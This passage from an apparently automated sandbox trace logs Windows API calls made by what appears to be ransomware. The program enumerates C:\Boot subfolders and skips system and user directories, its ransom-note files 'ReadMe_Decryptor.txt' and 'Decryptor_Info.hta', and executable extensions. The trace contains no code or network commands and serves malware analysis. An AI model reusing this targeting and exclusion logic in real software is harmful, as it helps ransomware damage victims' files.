nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0105.951] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0105.951] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0105.951] lstrlenW (lpString="fr-FR") returned 5 [0105.951] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="fr-FR" | out: lpString1="C:\\Boot\\fr-FR") returned="C:\\Boot\\fr-FR" [0105.951] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Windows") returned -1 [0105.951] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.951] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.951] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\ProgramData") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Intel") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\msys32") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Qt") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\ProgramData") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Program Files") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Windows") returned -1 [0105.952] lstrcmpiW (lpString1="C:\\Boot\\fr-FR", lpString2="C:\\Program Files (x86)") returned -1 [0105.952] lstrcatW (in: lpString1="C:\\Boot\\fr-FR", lpString2="\\" | out: lpString1="C:\\Boot\\fr-FR\\") returned="C:\\Boot\\fr-FR\\" [0105.952] lstrlenW (lpString="C:\\Boot\\fr-FR\\") returned 14 [0105.952] FindFirstFileExW (in: lpFileName="C:\\Boot\\fr-FR\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758a88 [0106.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.006] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.006] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.006] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.006] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.006] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.006] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.006] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.006] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.006] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.006] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.006] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.006] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.006] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.006] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.007] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757658 [0106.007] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7d38 [0106.007] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757658 | out: hHeap=0x6d0000) returned 1 [0106.007] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7d80 [0106.007] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.007] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.007] FindClose (in: hFindFile=0x758a88 | out: hFindFile=0x758a88) returned 1 [0106.007] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0106.007] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0106.007] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0106.007] lstrlenW (lpString="hu-HU") returned 5 [0106.007] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="hu-HU" | out: lpString1="C:\\Boot\\hu-HU") returned="C:\\Boot\\hu-HU" [0106.007] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Windows") returned -1 [0106.007] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.007] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.007] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\ProgramData") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Intel") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\msys32") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Qt") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\ProgramData") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Program Files") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Windows") returned -1 [0106.008] lstrcmpiW (lpString1="C:\\Boot\\hu-HU", lpString2="C:\\Program Files (x86)") returned -1 [0106.008] lstrcatW (in: lpString1="C:\\Boot\\hu-HU", lpString2="\\" | out: lpString1="C:\\Boot\\hu-HU\\") returned="C:\\Boot\\hu-HU\\" [0106.008] lstrlenW (lpString="C:\\Boot\\hu-HU\\") returned 14 [0106.008] FindFirstFileExW (in: lpFileName="C:\\Boot\\hu-HU\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758a88 [0106.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.009] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.009] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.009] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.009] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.009] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.009] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.009] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.009] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.009] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.009] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.010] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.010] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.010] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757658 [0106.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7d38 [0106.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757658 | out: hHeap=0x6d0000) returned 1 [0106.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7dc8 [0106.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.010] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.010] FindClose (in: hFindFile=0x758a88 | out: hFindFile=0x758a88) returned 1 [0106.010] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0106.010] lstrcmpW (lpString1="it-IT", lpString2=".") returned 1 [0106.010] lstrcmpW (lpString1="it-IT", lpString2="..") returned 1 [0106.010] lstrlenW (lpString="it-IT") returned 5 [0106.010] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="it-IT" | out: lpString1="C:\\Boot\\it-IT") returned="C:\\Boot\\it-IT" [0106.010] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Windows") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\ProgramData") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Intel") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\msys32") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Qt") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\ProgramData") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Program Files") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Windows") returned -1 [0106.011] lstrcmpiW (lpString1="C:\\Boot\\it-IT", lpString2="C:\\Program Files (x86)") returned -1 [0106.011] lstrcatW (in: lpString1="C:\\Boot\\it-IT", lpString2="\\" | out: lpString1="C:\\Boot\\it-IT\\") returned="C:\\Boot\\it-IT\\" [0106.012] lstrlenW (lpString="C:\\Boot\\it-IT\\") returned 14 [0106.012] FindFirstFileExW (in: lpFileName="C:\\Boot\\it-IT\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758a88 [0106.052] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.052] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.052] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.052] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.052] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.053] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.053] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.053] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.053] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.053] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.053] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.053] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.053] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.053] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.053] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.053] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757658 [0106.053] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7d38 [0106.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757658 | out: hHeap=0x6d0000) returned 1 [0106.053] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7e10 [0106.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0106.053] FindClose (in: hFindFile=0x758a88 | out: hFindFile=0x758a88) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0106.054] lstrcmpW (lpString1="ja-JP", lpString2=".") returned 1 [0106.054] lstrcmpW (lpString1="ja-JP", lpString2="..") returned 1 [0106.054] lstrlenW (lpString="ja-JP") returned 5 [0106.054] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ja-JP" | out: lpString1="C:\\Boot\\ja-JP") returned="C:\\Boot\\ja-JP" [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Windows") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\ProgramData") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Intel") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\msys32") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Qt") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\ProgramData") returned -1 [0106.054] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Program Files") returned -1 [0106.055] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Windows") returned -1 [0106.055] lstrcmpiW (lpString1="C:\\Boot\\ja-JP", lpString2="C:\\Program Files (x86)") returned -1 [0106.055] lstrcatW (in: lpString1="C:\\Boot\\ja-JP", lpString2="\\" | out: lpString1="C:\\Boot\\ja-JP\\") returned="C:\\Boot\\ja-JP\\" [0106.055] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0106.055] FindFirstFileExW (in: lpFileName="C:\\Boot\\ja-JP\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x758a88 [0106.055] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0106.055] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.055] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0106.055] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0106.055] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0106.055] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0106.055] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0106.055] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0106.055] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0106.056] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0106.056] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0106.056] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0106.056] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0106.056] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0106.056] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0106.056] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x757658 [0106.056] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7d38 [0106.056] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757658 | out: hHeap=0x6d0000) returned 1 [0106.056] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7e58 [0106.056] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7d38 | out: hHeap=0x6d0000) returned 1 [0106.056] FindNextFileW (in: hFindFile=0x758a88, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, 